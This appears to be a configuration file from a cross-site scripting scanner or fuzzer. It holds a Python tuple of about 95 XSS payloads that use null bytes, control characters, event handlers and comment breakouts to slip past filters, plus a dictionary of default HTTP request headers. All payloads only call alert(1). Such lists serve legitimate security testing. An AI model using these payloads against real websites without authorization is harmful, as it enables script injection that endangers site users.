fuzzes = (
    '<s\x00c\x00r\x00i\x00p\x00t>a\x00l\x00e\x00r\x00t(1);</s\x00c\x00r\x00i\x00p\x00t>',
    '\x00<script>alert(1);</script>',
    '<s\x00cript>alert(1);</script>',
    '<script>\x00alert(1);</script>',
    '<script>a\x00lert(1);</script>',
    '<script>al\x00ert(1);</script>',
    '<script>alert(1);\x00</script>',
    '<script>alert(1);</\x00script>',
    '<script>alert(1);</sc\x00ript>',
    '<script>alert(1);</script\x00>',
    '<s\x00cript>alert(1);</s\x00cript>',
    '<script type="text/javascript">alert(1);</script>',
    '<script\x00type="text/javascript">javascript:alert(1);</script>',
    '<img src=1 href=1 onerror="javascript:alert(1)"></img>',
    '<audio src=1 href=1 onerror="javascript:alert(1)"></audio>',
    '<video src=1 href=1 onerror="javascript:alert(1)"></video>',
    '<image src=1 href=1 onerror="javascript:alert(1)"></image>',
    '<script src=1 href=1 onerror="javascript:alert(1)"></script>',
    '<script>javascript:alert(1)</script\x0D',
    '<script>javascript:alert(1)</script\x0A',
    '<script>javascript:alert(1)</script\x0B',
    '<script charset="\x22>javascript:alert(1)</script>',
    '<script>/* *\x2A/javascript:alert(1)// */</script>',
    '<script>/* *\x00/javascript:alert(1)// */</script>',
    '<style></style\x00<img src="about:blank" onerror=javascript:alert(1)//></style>',
    '<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>',
    '<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>',
    '<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>',
    '<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>',
    '<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>',
    '<!--><img src=xxx:x onerror=javascript:alert(1)> -->',
    '--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->',
    '--><!-- --> <img src=xxx:x onerror=javascript:alert(1)> -->',
    '--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->',
    '--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->',
    '<script\x20type="text/javascript">javascript:alert(1);</script>',
    '<script\x3Etype="text/javascript">javascript:alert(1);</script>',
    '<script\x0Dtype="text/javascript">javascript:alert(1);</script>',
    '<script\x09type="text/javascript">javascript:alert(1);</script>',
    '<script\x0Ctype="text/javascript">javascript:alert(1);</script>',
    '<script\x2Ftype="text/javascript">javascript:alert(1);</script>',
    '<script\x0Atype="text/javascript">javascript:alert(1);</script>',
    '<script\x2F>javascript:alert(1)</script>',
    '<script\x20>javascript:alert(1)</script>',
    '<script\x0D>javascript:alert(1)</script>',
    '<script\x0A>javascript:alert(1)</script>',
    '<script\x0C>javascript:alert(1)</script>',
    '<script\x00>javascript:alert(1)</script>',
    '<script\x09>javascript:alert(1)</script>',
    '<script>javascript:alert(1)<\x00/script>',
    '<img src=# onerror\x3D"javascript:alert(1)" >',
    '<input onfocus=javascript:alert(1) autofocus>',
    '<input onblur=javascript:alert(1) autofocus><input autofocus>',
    '<frameset onload=javascript:alert(1)>',
    '<!--<img src="--><img src=x onerror=javascript:alert(1)//">',
    '<style><img src="</style><img src=x onerror=javascript:alert(1)//">',
    '<? foo="><script>javascript:alert(1)</script>">',
    '<! foo="><script>javascript:alert(1)</script>">',
    '</ foo="><script>javascript:alert(1)</script>">',
    '<img \x00src=x onerror="alert(1)">',
    '<img \x47src=x onerror="javascript:alert(1)">',
    '<img \x11src=x onerror="javascript:alert(1)">',
    '<img \x12src=x onerror="javascript:alert(1)">',
    '<img\x47src=x onerror="javascript:alert(1)">',
    '<img\x10src=x onerror="javascript:alert(1)">',
    '<img\x13src=x onerror="javascript:alert(1)">',
    '<img\x32src=x onerror="javascript:alert(1)">',
    '<img\x47src=x onerror="javascript:alert(1)">',
    '<img\x11src=x onerror="javascript:alert(1)">',
    '<img \x47src=x onerror="javascript:alert(1)">',
    '<img \x34src=x onerror="javascript:alert(1)">',
    '<img \x39src=x onerror="javascript:alert(1)">',
    '<img \x00src=x onerror="javascript:alert(1)">',
    '<img src\x09=x onerror="javascript:alert(1)">',
    '<img src\x10=x onerror="javascript:alert(1)">',
    '<img src\x13=x onerror="javascript:alert(1)">',
    '<img src\x32=x onerror="javascript:alert(1)">',
    '<img src\x12=x onerror="javascript:alert(1)">',
    '<img src\x11=x onerror="javascript:alert(1)">',
    '<img src\x00=x onerror="javascript:alert(1)">',
    '<img src\x47=x onerror="javascript:alert(1)">',
    '<img src=x\x09onerror="javascript:alert(1)">',
    '<img src=x\x10onerror="javascript:alert(1)">',
    '<img src=x\x11onerror="javascript:alert(1)">',
    '<img src=x\x12onerror="javascript:alert(1)">',
    '<img src=x\x13onerror="javascript:alert(1)">',
    '<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">',
    '<img src=x onerror=\x09"javascript:alert(1)">',
    '<img src=x onerror=\x10"javascript:alert(1)">',
    '<img src=x onerror=\x11"javascript:alert(1)">',
    '<img src=x onerror=\x12"javascript:alert(1)">',
    '<img src=x onerror=\x32"javascript:alert(1)">',
    '<img src=x onerror=\x00"javascript:alert(1)">'
)

headers = {  # default headers
    'User-Agent': '$',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip,deflate',
    'Connection': 'close',
    'DNT': '1',
    'Upgrade-Insecure-Requests': '1'
}
